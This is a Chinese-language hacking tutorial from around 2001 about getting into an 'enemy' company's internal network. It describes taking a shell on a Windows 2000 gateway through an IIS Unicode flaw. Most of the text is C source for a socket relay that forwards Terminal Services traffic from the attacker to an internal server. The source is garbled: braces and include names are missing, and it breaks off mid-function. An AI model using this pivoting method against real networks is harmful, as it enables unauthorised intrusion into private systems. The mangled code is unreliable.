编程突破TCP/IP过滤防火墙进入内网

现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路，宽带、DDN、ADSL、ISDN等等，然后用一台服务器做网关，服务器两块网卡，一块是连接到Internet，另一块是连接到内网的HUB或者交换机,然后内网的其他机器就可以通过网关连接到Internet。

也许有些人会这样想，我在内网之中，我们之间没有直接的连接，你没有办法攻击我。事实并非如此，在内网的机器同样可能遭受到来自Internet的攻击，当然前提是攻击者已经取得网关服务器的某些权限，呵呵，这是不是废话？其实，Internet上很多做网关的服务器并未经过严格的安全配置，要获取权限也不是想象中的那么难。

Ok!废话就不说了，切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程管理工具，不是吗？呵呵。没有做特别说明的话，文中提到的服务器OS都为windows 2000。服务器为Linux或其他的话，原理也差不多，把程序稍微修改就行了。

假设敌人网络拓扑如下图所示，没有安装防火墙或在网关服务器上做TCP/IP限制。

我们的目标是连接上敌人内网的Terminal Server[192.168.1.3]，因为没有办法直接和他建立连接，那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k，IIS有Unicode漏洞[现在要找些有漏洞的机器太容易了，但我只是scripts kid，只会利用现成的漏洞做些简单的攻击：（555），那么我们就得到一个网关的shell了，我们可以在那上面运行我们的程序，虽然权限很低，但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序，让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话：实际入侵过程是先取得网关服务器的权限，然后用他做跳板，进一步摸清它的内部网络拓扑结构，再做进一步的入侵，现在敌人的网络拓扑是我们给他设计的。

攻击流程如下：

<1>在网关服务器202.2.2.2运行我们的程序AgentGateWay，他监听TCP 3389端口[改成别的，那我们就要相应的修改TermClient了]等待我们去连接。

<2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。

<3>202.2.2.2.接受202.1.1.1的连接，然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]

<4>这样我们和敌人内网的TermServer之间的数据通道就建好了，接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候，其实出来的界面是敌人内网的192.168.1.3，感觉怎么样？

程序代码如下：

Module Name:AgentGateWay.c

Date:2001/4/15

CopyRight(c) eyas

说明：端口重定向工具，在网关上运行，把端口重定向到内网的IP、PORT，

就可以进入内网了

sock[0]==>sClient sock[1]==>sTarget

#include

#include

#include "TCPDataRedird.c"

#define TargetIP TEXT("192.168.1.3")

#define TargetPort (int)3389

#define ListenPort (int)3389//监听端口

#pragma comment(lib,"ws2_32.lib")

int main()

WSADATA wsd;

SOCKET sListen=INVALID_SOCKET,//本机监听的socket

sock[2];

struct sockaddr_in Local,Client,Target;

int iAddrSize;

HANDLE hThreadC2T=NULL,//C2T=ClientToTarget

hThreadT2C=NULL;//T2C=TargetToClient

DWORD dwThreadID;

__try

if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)

printf("\nWSAStartup() failed:%d",GetLastError());

__leave;

sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

if(sListen==INVALID_SOCKET)

printf("\nsocket() failed:%d",GetLastError());

__leave;

Local.sin_addr.s_addr=htonl(INADDR_ANY);

Local.sin_family=AF_INET;

Local.sin_port=htons(ListenPort);

Target.sin_family=AF_INET;

Target.sin_addr.s_addr=inet_addr(TargetIP);

Target.sin_port=htons(TargetPort);

if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR)

printf("\nbind() failed:%d",GetLastError());

__leave;

if(listen(sListen,1)==SOCKET_ERROR)

printf("\nlisten() failed:%d",GetLastError());

__leave;

scoket循环

while(1)

printf("\n\n*************Waiting Client Connect to**************\n\n");

iAddrSize=sizeof(Client);

//get socket sClient

sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);

if(sock[0]==INVALID_SOCKET)

printf("\naccept() failed:%d",GetLastError());

break;

printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr), ntohs(Client.sin_port));

//create socket sTarget

sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

if(sock[1]==INVALID_SOCKET)

printf("\nsocket() failed:%d",GetLastError());

__leave;

//connect to target port

if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR)

printf("\nconnect() failed:%d",GetLastError());

__leave;

printf("\nconnect to target 3389 success!");

创建两个线程进行数据转发

hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);

hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);

//等待两个线程结束

WaitForSingleObject(hThreadC2T,INFINITE);

WaitForSingleObject(hThreadT2C,INFINITE);

CloseHandle(hThreadC2T);

CloseHandle(hThreadT2C);

closesocket(sock[1]);

closesocket(sock[0]);

printf("\n\n*****************Connection Close*******************\n\n");

}//end of sock外循环

}//end of try

__finally

if(sListen!=INVALID_SOCKET) closesocket(sListen);

if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);

if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);

if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);

if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);

WSACleanup();

return 0;

Module:TCPDataRedird.c

Date:2001/4/16

CopyRight(c) eyas

HomePage:www.patching.net

Thanks to shotgun

说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget

#define BuffSize 20*1024 //缓冲区大小20k

//此函数负责从Client读取数据，然后转发给Target

DWORD WINAPI TCPDataC2T(SOCKET* sock)

int iRet,

ret=-1,//select 返回值

iLeft,

idx,

iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize

char szSendToTargetBuff[BuffSize]=,

szRecvFromClientBuff[BuffSize]=;

fd_set fdread,fdwrite;

printf("\n\n*****************Connection Active*******************\n\n");

while(1)

FD_ZERO(&fdread);

FD_ZERO(&fdwrite);

FD_SET(sock[0],&fdread);

FD_SET(sock[1],&fdwrite);

if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)